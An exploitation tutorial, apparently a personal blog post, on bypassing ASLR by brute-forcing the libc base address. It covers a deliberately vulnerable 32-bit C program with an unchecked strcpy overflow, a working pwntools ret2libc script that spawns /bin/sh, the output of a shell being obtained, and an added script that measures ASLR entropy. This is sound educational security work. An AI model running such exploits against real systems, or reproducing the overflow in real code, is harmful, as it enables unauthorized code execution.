NEKO

Linux Exploit: Bypassing ASLR, Part 2

2018/05/24

The main idea is to brute-force the libc base address.
Vulnerable source:

```c
#include <stdio.h>
#include <string.h>

/* Deliberately vulnerable: strcpy() copies argv[1] into a fixed 256-byte
   stack buffer with no length check, so an over-long argument overwrites
   the saved return address. */
void vulnerable(char *arg){
    char buf[256];
    strcpy(buf, arg);
}

int main(int argc, char *argv[]){
    vulnerable(argv[1]);
    return 0;
}
```

Enable ASLR:

```console
neko@ubuntu:~/neko/6$ sudo sh -c "echo 2 > /proc/sys/kernel/randomize_va_space"
```

Compile:

```console
neko@ubuntu:~/neko/6$ gcc -m32 -fno-stack-protector -o crackme7.out crackme7.c
```

-m32: produce a 32-bit ELF executable
-fno-stack-protector: disable the stack protector (canary)

Check the libc base address:

```console
neko@ubuntu:~/neko/7$ ldd ./crackme7.out | grep libc
libc.so.6 => /lib32/libc.so.6 (0xf7de3000)
neko@ubuntu:~/neko/7$ ldd ./crackme7.out | grep libc
libc.so.6 => /lib32/libc.so.6 (0xf7d09000)
neko@ubuntu:~/neko/7$ ldd ./crackme7.out | grep libc
libc.so.6 => /lib32/libc.so.6 (0xf7d25000)
neko@ubuntu:~/neko/7$ ldd ./crackme7.out | grep libc
libc.so.6 => /lib32/libc.so.6 (0xf7de2000)
```

Because the libc base only moves within a small range on this 32-bit build (only a few address bits differ between the runs above), pick one observed value, 0xf7de3000, as the guessed libc base and write a script that simply retries until the guess is right.
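As an added example (not part of the original post), here is a small audit script that parses ldd samples like the ones above and estimates how many address bits actually vary, which is what decides whether a fixed guess is realistic; the sample lines are the four captured on the page, and a real audit would collect many more.

```python
import re

# Constructed sample: the four ldd lines captured on the page
# (randomize_va_space=2, 32-bit binary). Few samples give a lower bound only.
SAMPLE_LDD = """\
libc.so.6 => /lib32/libc.so.6 (0xf7de3000)
libc.so.6 => /lib32/libc.so.6 (0xf7d09000)
libc.so.6 => /lib32/libc.so.6 (0xf7d25000)
libc.so.6 => /lib32/libc.so.6 (0xf7de2000)
"""

LDD_LINE = re.compile(r"libc\.so\.6\s*=>\s*\S+\s*\((0x[0-9a-fA-F]+)\)")


def parse_libc_bases(ldd_text):
    """Return the libc load addresses found in ldd-style output."""
    return [int(m.group(1), 16) for m in LDD_LINE.finditer(ldd_text)]


def estimate_aslr_bits(bases):
    """Lower-bound estimate of libc randomisation from sampled load addresses.

    XOR-ing every sample against the first leaves a 1 in each bit that changed
    between runs; the lowest and highest such bits bound the random field.
    More samples can only raise the estimate, so treat it as a floor.
    """
    if len(bases) < 2:
        raise ValueError("need at least two samples")
    changed = 0
    for b in bases[1:]:
        changed |= b ^ bases[0]
    if changed == 0:
        return {"distinct": 1, "low_bit": None, "high_bit": None, "bits": 0}
    low = (changed & -changed).bit_length() - 1   # lowest bit that varied
    high = changed.bit_length() - 1               # highest bit that varied
    return {"distinct": len(set(bases)), "low_bit": low, "high_bit": high,
            "bits": high - low + 1}


if __name__ == "__main__":
    est = estimate_aslr_bits(parse_libc_bases(SAMPLE_LDD))
    # For the page's samples: bits 12..19 vary, i.e. at least 8 bits of
    # page-granular randomisation, far too little to resist retrying.
    print(est)
```

A result this small is the finding a defender cares about: the fix is a 64-bit build (and PIE for the main binary), not a different libc address.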

exp:

```python
# Python 2 / pwntools syntax, as on the original page
from pwn import *
from subprocess import call

libc = ELF('./libc.so.6')        # copy of the target's 32-bit libc

libc_base = 0xf7de3000           # one of the observed libc load addresses
RAM_sys = libc_base + libc.symbols['system']
RAM_sh = libc_base + libc.search('/bin/sh').next()
# 0x108 bytes of padding + 4 bytes of saved ebp, then system(), a dummy
# return address and the pointer to "/bin/sh"
payload = 'a' * 0x108 + 'a' * 4 + p32(RAM_sys) + 'a' * 4 + p32(RAM_sh)
while 1:
    # rerun the target until the guessed base matches the real one
    ret = call(["./crackme7.out", payload])
    print ret,
    if (not ret):
        break
    else:
        print 'error'
```

Result (-11 is a SIGSEGV exit, i.e. a wrong guess):

```console
-11 error
-11 error
-11 error
-11 error
-11 error
-11 error
-11 error
-11 error
-11 error
-11 error
-11 error
$ uid=1000(neko) gid=1000(neko) groups=1000(neko),4(adm),24(cdrom),27(sudo),30(dip),46(plugdev),113(lpadmin),128(sambashare)
$ core crackme7.out libc.so.6
crackme7.c exp7.py peda-session-crackme7.out.txt
$
```

The commands typed into the shell are not echoed, though; only their output is shown.

Original author: n3k0

Published: May 24th 2018, 10:58:41

Shout: no 魔夜2 to play, I'm dying
